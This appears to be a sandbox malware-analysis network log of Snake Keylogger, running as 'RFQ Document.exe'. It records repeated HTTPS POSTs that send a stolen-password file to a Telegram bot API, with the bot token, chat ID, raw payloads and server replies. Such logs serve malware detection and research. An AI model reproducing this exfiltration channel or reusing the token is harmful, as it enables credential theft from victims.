                                            2021-09-28 05:58:39 UTC133OUTData Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 39 38 32 35 35 63 63 65 36 38 34 66 34 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 53 6e 61 6b 65 50 57 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 50 57 20 7c 20 6a 6f 6e 65 73 20 7c 20 53 6e 61 6b 65 0d 0a 20 0d 0a 0d 0a 50 43 20 4e 61 6d 65 3a 34 37 33 36 32 37 0d 0a 44 61 74 65 20 61 6e 64 20 54 69 6d 65 3a 20 39 2f 32 38 2f 32 30 32 31 20 2f 20 37 3a 35 38 3a 30 32 20 41 4d 0d 0a 43 6c 69 65 6e 74 20 49 50 3a
                                            Data Ascii: --------------------------8d98255cce684f4Content-Disposition: form-data; name="document"; filename="SnakePW.txt"Content-Type: application/x-ms-dos-executablePW | user | Snake PC Name:473627Date and Time: 9/28/2021 / 7:58:02 AMClient IP:
                                            2021-09-28 05:58:39 UTC133INHTTP/1.1 200 OK
                                            Server: nginx/1.18.0
                                            Date: Tue, 28 Sep 2021 05:58:39 GMT
                                            Content-Type: application/json
                                            Content-Length: 520
                                            Connection: close
                                            Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                            Access-Control-Allow-Origin: *
                                            Access-Control-Allow-Methods: GET, POST, OPTIONS
                                            Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                            2021-09-28 05:58:39 UTC133INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 31 32 36 36 36 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 31 39 32 36 35 33 37 33 39 33 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 73 69 72 6d 6f 6d 6f 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 73 69 72 6d 6f 6d 6f 42 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 31 36 36 34 37 34 38 34 31 31 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 5a 75 62 62 79 22 2c 22 6c 61 73 74 5f 6e 61 6d 65 22 3a 22 7a 75 62 62 79 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 7a 75 62 62 79 7a 75 62 62 79 30 31 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 36 33 32 38 30 38 37 31 39 2c 22 64
                                            Data Ascii: {"ok":true,"result":{"message_id":12666,"from":{"id":1926537393,"is_bot":true,"first_name":"sirmomo","username":"sirmomoBot"},"chat":{"id":1664748411,"first_name":"Zubby","last_name":"zubby","username":"zubbyzubby01","type":"private"},"date":1632808719,"d


                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                            84192.168.2.449860149.154.167.220443C:\Users\user\Desktop\RFQ Document.exe
                                            TimestampkBytes transferredDirectionData
                                            2021-09-28 05:58:39 UTC134OUTPOST /bot1926537393:AAHGSUhtLeQU8qms_2blDH9qpvo-fEuwi9E/sendDocument?chat_id=1664748411&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Keylogger%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1
                                            Content-Type: multipart/form-data; boundary=------------------------8d98255cd0582ce
                                            Host: api.telegram.org
                                            Content-Length: 407
                                            2021-09-28 05:58:39 UTC134OUTData Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 39 38 32 35 35 63 64 30 35 38 32 63 65 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 53 6e 61 6b 65 50 57 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 50 57 20 7c 20 6a 6f 6e 65 73 20 7c 20 53 6e 61 6b 65 0d 0a 20 0d 0a 0d 0a 50 43 20 4e 61 6d 65 3a 34 37 33 36 32 37 0d 0a 44 61 74 65 20 61 6e 64 20 54 69 6d 65 3a 20 39 2f 32 38 2f 32 30 32 31 20 2f 20 37 3a 35 38 3a 30 32 20 41 4d 0d 0a 43 6c 69 65 6e 74 20 49 50 3a
                                            Data Ascii: --------------------------8d98255cd0582ceContent-Disposition: form-data; name="document"; filename="SnakePW.txt"Content-Type: application/x-ms-dos-executablePW | user | Snake PC Name:473627Date and Time: 9/28/2021 / 7:58:02 AMClient IP:
                                            2021-09-28 05:58:39 UTC135INHTTP/1.1 200 OK
                                            Server: nginx/1.18.0
                                            Date: Tue, 28 Sep 2021 05:58:39 GMT
                                            Content-Type: application/json
                                            Content-Length: 520
                                            Connection: close
                                            Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                            Access-Control-Allow-Origin: *
                                            Access-Control-Allow-Methods: GET, POST, OPTIONS
                                            Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                            2021-09-28 05:58:39 UTC135INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 31 32 36 36 37 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 31 39 32 36 35 33 37 33 39 33 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 73 69 72 6d 6f 6d 6f 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 73 69 72 6d 6f 6d 6f 42 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 31 36 36 34 37 34 38 34 31 31 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 5a 75 62 62 79 22 2c 22 6c 61 73 74 5f 6e 61 6d 65 22 3a 22 7a 75 62 62 79 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 7a 75 62 62 79 7a 75 62 62 79 30 31 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 36 33 32 38 30 38 37 31 39 2c 22 64
                                            Data Ascii: {"ok":true,"result":{"message_id":12667,"from":{"id":1926537393,"is_bot":true,"first_name":"sirmomo","username":"sirmomoBot"},"chat":{"id":1664748411,"first_name":"Zubby","last_name":"zubby","username":"zubbyzubby01","type":"private"},"date":1632808719,"d


                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                            85192.168.2.449861149.154.167.220443C:\Users\user\Desktop\RFQ Document.exe
                                            TimestampkBytes transferredDirectionData
                                            2021-09-28 05:58:39 UTC136OUTPOST /bot1926537393:AAHGSUhtLeQU8qms_2blDH9qpvo-fEuwi9E/sendDocument?chat_id=1664748411&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Keylogger%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1
                                            Content-Type: multipart/form-data; boundary=------------------------8d98255cd1d59a0
                                            Host: api.telegram.org
                                            Content-Length: 407
                                            2021-09-28 05:58:39 UTC136OUTData Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 39 38 32 35 35 63 64 31 64 35 39 61 30 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 53 6e 61 6b 65 50 57 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 50 57 20 7c 20 6a 6f 6e 65 73 20 7c 20 53 6e 61 6b 65 0d 0a 20 0d 0a 0d 0a 50 43 20 4e 61 6d 65 3a 34 37 33 36 32 37 0d 0a 44 61 74 65 20 61 6e 64 20 54 69 6d 65 3a 20 39 2f 32 38 2f 32 30 32 31 20 2f 20 37 3a 35 38 3a 30 32 20 41 4d 0d 0a 43 6c 69 65 6e 74 20 49 50 3a
                                            Data Ascii: --------------------------8d98255cd1d59a0Content-Disposition: form-data; name="document"; filename="SnakePW.txt"Content-Type: application/x-ms-dos-executablePW | user | Snake PC Name:473627Date and Time: 9/28/2021 / 7:58:02 AMClient IP:
                                            2021-09-28 05:58:39 UTC136INHTTP/1.1 200 OK
                                            Server: nginx/1.18.0
                                            Date: Tue, 28 Sep 2021 05:58:39 GMT
                                            Content-Type: application/json
                                            Content-Length: 520
                                            Connection: close
                                            Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                            Access-Control-Allow-Origin: *
                                            Access-Control-Allow-Methods: GET, POST, OPTIONS
                                            Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                            2021-09-28 05:58:39 UTC137INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 31 32 36 36 38 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 31 39 32 36 35 33 37 33 39 33 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 73 69 72 6d 6f 6d 6f 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 73 69 72 6d 6f 6d 6f 42 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 31 36 36 34 37 34 38 34 31 31 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 5a 75 62 62 79 22 2c 22 6c 61 73 74 5f 6e 61 6d 65 22 3a 22 7a 75 62 62 79 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 7a 75 62 62 79 7a 75 62 62 79 30 31 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 36 33 32 38 30 38 37 31 39 2c 22 64
                                            Data Ascii: {"ok":true,"result":{"message_id":12668,"from":{"id":1926537393,"is_bot":true,"first_name":"sirmomo","username":"sirmomoBot"},"chat":{"id":1664748411,"first_name":"Zubby","last_name":"zubby","username":"zubbyzubby01","type":"private"},"date":1632808719,"d


                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                            86192.168.2.449862149.154.167.220443C:\Users\user\Desktop\RFQ Document.exe
                                            TimestampkBytes transferredDirectionData
                                            2021-09-28 05:58:39 UTC137OUTPOST /bot1926537393:AAHGSUhtLeQU8qms_2blDH9qpvo-fEuwi9E/sendDocument?chat_id=1664748411&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Keylogger%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1
                                            Content-Type: multipart/form-data; boundary=------------------------8d98255cd39f68c
                                            Host: api.telegram.org
                                            Content-Length: 407
                                            2021-09-28 05:58:39 UTC137OUTData Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 39 38 32 35 35 63 64 33 39 66 36 38 63 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 53 6e 61 6b 65 50 57 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 50 57 20 7c 20 6a 6f 6e 65 73 20 7c 20 53 6e 61 6b 65 0d 0a 20 0d 0a 0d 0a 50 43 20 4e 61 6d 65 3a 34 37 33 36 32 37 0d 0a 44 61 74 65 20 61 6e 64 20 54 69 6d 65 3a 20 39 2f 32 38 2f 32 30 32 31 20 2f 20 37 3a 35 38 3a 30 32 20 41 4d 0d 0a 43 6c 69 65 6e 74 20 49 50 3a
                                            Data Ascii: --------------------------8d98255cd39f68cContent-Disposition: form-data; name="document"; filename="SnakePW.txt"Content-Type: application/x-ms-dos-executablePW | user | Snake PC Name:473627Date and Time: 9/28/2021 / 7:58:02 AMClient IP:
                                            2021-09-28 05:58:39 UTC138INHTTP/1.1 200 OK
                                            Server: nginx/1.18.0
                                            Date: Tue, 28 Sep 2021 05:58:39 GMT
                                            Content-Type: application/json
                                            Content-Length: 521
                                            Connection: close
                                            Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                            Access-Control-Allow-Origin: *
                                            Access-Control-Allow-Methods: GET, POST, OPTIONS
                                            Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                            2021-09-28 05:58:39 UTC138INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 31 32 36 36 39 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 31 39 32 36 35 33 37 33 39 33 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 73 69 72 6d 6f 6d 6f 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 73 69 72 6d 6f 6d 6f 42 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 31 36 36 34 37 34 38 34 31 31 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 5a 75 62 62 79 22 2c 22 6c 61 73 74 5f 6e 61 6d 65 22 3a 22 7a 75 62 62 79 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 7a 75 62 62 79 7a 75 62 62 79 30 31 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 36 33 32 38 30 38 37 31 39 2c 22 64
                                            Data Ascii: {"ok":true,"result":{"message_id":12669,"from":{"id":1926537393,"is_bot":true,"first_name":"sirmomo","username":"sirmomoBot"},"chat":{"id":1664748411,"first_name":"Zubby","last_name":"zubby","username":"zubbyzubby01","type":"private"},"date":1632808719,"d


                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                            87192.168.2.449863149.154.167.220443C:\Users\user\Desktop\RFQ Document.exe
                                            TimestampkBytes transferredDirectionData
                                            2021-09-28 05:58:39 UTC139OUTPOST /bot1926537393:AAHGSUhtLeQU8qms_2blDH9qpvo-fEuwi9E/sendDocument?chat_id=1664748411&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Keylogger%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1
                                            Content-Type: multipart/form-data; boundary=------------------------8d98255cd51cd5e
                                            Host: api.telegram.org
                                            Content-Length: 407
                                            2021-09-28 05:58:39 UTC139OUTData Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 39 38 32 35 35 63 64 35 31 63 64 35 65 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 53 6e 61 6b 65 50 57 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 50 57 20 7c 20 6a 6f 6e 65 73 20 7c 20 53 6e 61 6b 65 0d 0a 20 0d 0a 0d 0a 50 43 20 4e 61 6d 65 3a 34 37 33 36 32 37 0d 0a 44 61 74 65 20 61 6e 64 20 54 69 6d 65 3a 20 39 2f 32 38 2f 32 30 32 31 20 2f 20 37 3a 35 38 3a 30 32 20 41 4d 0d 0a 43 6c 69 65 6e 74 20 49 50 3a
                                            Data Ascii: --------------------------8d98255cd51cd5eContent-Disposition: form-data; name="document"; filename="SnakePW.txt"Content-Type: application/x-ms-dos-executablePW | user | Snake PC Name:473627Date and Time: 9/28/2021 / 7:58:02 AMClient IP:
                                            2021-09-28 05:58:40 UTC140INHTTP/1.1 200 OK
                                            Server: nginx/1.18.0
                                            Date: Tue, 28 Sep 2021 05:58:40 GMT
                                            Content-Type: application/json
                                            Content-Length: 520
                                            Connection: close
                                            Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                            Access-Control-Allow-Origin: *
                                            Access-Control-Allow-Methods: GET, POST, OPTIONS
                                            Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                            2021-09-28 05:58:40 UTC140INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 31 32 36 37 30 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 31 39 32 36 35 33 37 33 39 33 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 73 69 72 6d 6f 6d 6f 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 73 69 72 6d 6f 6d 6f 42 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 31 36 36 34 37 34 38 34 31 31 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 5a 75 62 62 79 22 2c 22 6c 61 73 74 5f 6e 61 6d 65 22 3a 22 7a 75 62 62 79 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 7a 75 62 62 79 7a 75 62 62 79 30 31 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 36 33 32 38 30 38 37 32 30 2c 22 64
                                            Data Ascii: {"ok":true,"result":{"message_id":12670,"from":{"id":1926537393,"is_bot":true,"first_name":"sirmomo","username":"sirmomoBot"},"chat":{"id":1664748411,"first_name":"Zubby","last_name":"zubby","username":"zubbyzubby01","type":"private"},"date":1632808720,"d


                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                            88192.168.2.449864149.154.167.220443C:\Users\user\Desktop\RFQ Document.exe
                                            TimestampkBytes transferredDirectionData
                                            2021-09-28 05:58:40 UTC140OUTPOST /bot1926537393:AAHGSUhtLeQU8qms_2blDH9qpvo-fEuwi9E/sendDocument?chat_id=1664748411&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Keylogger%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1
                                            Content-Type: multipart/form-data; boundary=------------------------8d98255cd69a4f9
                                            Host: api.telegram.org
                                            Content-Length: 407
                                            2021-09-28 05:58:40 UTC141OUTData Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 39 38 32 35 35 63 64 36 39 61 34 66 39 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 53 6e 61 6b 65 50 57 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 50 57 20 7c 20 6a 6f 6e 65 73 20 7c 20 53 6e 61 6b 65 0d 0a 20 0d 0a 0d 0a 50 43 20 4e 61 6d 65 3a 34 37 33 36 32 37 0d 0a 44 61 74 65 20 61 6e 64 20 54 69 6d 65 3a 20 39 2f 32 38 2f 32 30 32 31 20 2f 20 37 3a 35 38 3a 30 32 20 41 4d 0d 0a 43 6c 69 65 6e 74 20 49 50 3a
                                            Data Ascii: --------------------------8d98255cd69a4f9Content-Disposition: form-data; name="document"; filename="SnakePW.txt"Content-Type: application/x-ms-dos-executablePW | user | Snake PC Name:473627Date and Time: 9/28/2021 / 7:58:02 AMClient IP:
                                            2021-09-28 05:58:40 UTC141INHTTP/1.1 200 OK
                                            Server: nginx/1.18.0
                                            Date: Tue, 28 Sep 2021 05:58:40 GMT
                                            Content-Type: application/json
                                            Content-Length: 520
                                            Connection: close
                                            Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                            Access-Control-Allow-Origin: *
                                            Access-Control-Allow-Methods: GET, POST, OPTIONS
                                            Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                            2021-09-28 05:58:40 UTC141INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 31 32 36 37 31 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 31 39 32 36 35 33 37 33 39 33 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 73 69 72 6d 6f 6d 6f 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 73 69 72 6d 6f 6d 6f 42 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 31 36 36 34 37 34 38 34 31 31 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 5a 75 62 62 79 22 2c 22 6c 61 73 74 5f 6e 61 6d 65 22 3a 22 7a 75 62 62 79 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 7a 75 62 62 79 7a 75 62 62 79 30 31 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 36 33 32 38 30 38 37 32 30 2c 22 64
                                            Data Ascii: {"ok":true,"result":{"message_id":12671,"from":{"id":1926537393,"is_bot":true,"first_name":"sirmomo","username":"sirmomoBot"},"chat":{"id":1664748411,"first_name":"Zubby","last_name":"zubby","username":"zubbyzubby01","type":"private"},"date":1632808720,"d


                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                            89192.168.2.449865149.154.167.220443C:\Users\user\Desktop\RFQ Document.exe
                                            TimestampkBytes transferredDirectionData
                                            2021-09-28 05:58:40 UTC142OUTPOST /bot1926537393:AAHGSUhtLeQU8qms_2blDH9qpvo-fEuwi9E/sendDocument?chat_id=1664748411&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Keylogger%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1
                                            Content-Type: multipart/form-data; boundary=------------------------8d98255cd7f1cd4
                                            Host: api.telegram.org
                                            Content-Length: 407
                                            2021-09-28 05:58:40 UTC142OUTData Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 39 38 32 35 35 63 64 37 66 31 63 64 34 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 53 6e 61 6b 65 50 57 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 50 57 20 7c 20 6a 6f 6e 65 73 20 7c 20 53 6e 61 6b 65 0d 0a 20 0d 0a 0d 0a 50 43 20 4e 61 6d 65 3a 34 37 33 36 32 37 0d 0a 44 61 74 65 20 61 6e 64 20 54 69 6d 65 3a 20 39 2f 32 38 2f 32 30 32 31 20 2f 20 37 3a 35 38 3a 30 32 20 41 4d 0d 0a 43 6c 69 65 6e 74 20 49 50 3a
                                            Data Ascii: --------------------------8d98255cd7f1cd4Content-Disposition: form-data; name="document"; filename="SnakePW.txt"Content-Type: application/x-ms-dos-executablePW | user | Snake PC Name:473627Date and Time: 9/28/2021 / 7:58:02 AMClient IP:
                                            2021-09-28 05:58:40 UTC143INHTTP/1.1 200 OK
                                            Server: nginx/1.18.0
                                            Date: Tue, 28 Sep 2021 05:58:40 GMT
                                            Content-Type: application/json
                                            Content-Length: 520
                                            Connection: close
                                            Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                            Access-Control-Allow-Origin: *
                                            Access-Control-Allow-Methods: GET, POST, OPTIONS
                                            Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                            2021-09-28 05:58:40 UTC143INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 31 32 36 37 32 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 31 39 32 36 35 33 37 33 39 33 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 73 69 72 6d 6f 6d 6f 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 73 69 72 6d 6f 6d 6f 42 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 31 36 36 34 37 34 38 34 31 31 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 5a 75 62 62 79 22 2c 22 6c 61 73 74 5f 6e 61 6d 65 22 3a 22 7a 75 62 62 79 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 7a 75 62 62 79 7a 75 62 62 79 30 31 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 36 33 32 38 30 38 37 32 30 2c 22 64
                                            Data Ascii: {"ok":true,"result":{"message_id":12672,"from":{"id":1926537393,"is_bot":true,"first_name":"sirmomo","username":"sirmomoBot"},"chat":{"id":1664748411,"first_name":"Zubby","last_name":"zubby","username":"zubbyzubby01","type":"private"},"date":1632808720,"d


                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                            9192.168.2.449783149.154.167.220443C:\Users\user\Desktop\RFQ Document.exe
                                            TimestampkBytes transferredDirectionData
                                            2021-09-28 05:58:22 UTC14OUTPOST /bot1926537393:AAHGSUhtLeQU8qms_2blDH9qpvo-fEuwi9E/sendDocument?chat_id=1664748411&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Keylogger%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1
                                            Content-Type: multipart/form-data; boundary=------------------------8d98255c2eaaeaa
                                            Host: api.telegram.org
                                            Content-Length: 407
